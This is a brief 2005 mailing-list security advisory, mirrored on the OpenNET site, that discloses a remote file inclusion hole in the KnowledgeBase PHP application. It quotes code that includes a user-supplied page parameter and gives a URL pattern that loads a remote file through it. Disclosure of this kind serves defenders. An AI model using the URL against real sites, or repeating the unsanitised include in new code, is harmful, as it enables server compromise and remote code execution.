The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


KnowledgeBase


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 12 Mar 2005 12:15:47 -0000
From: Francisco Alisson <dominusvis@click21.com.br.>
To: [email protected]
Subject: KnowledgeBase
X-Virus-Scanned: antivirus-gw at tyumen.ru



Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

if ($page == ""){
 $page = "startup";
}
 @include("$page.php");
?>

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://&#091;file]

Dominus_Vis
[Infektion Group]


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру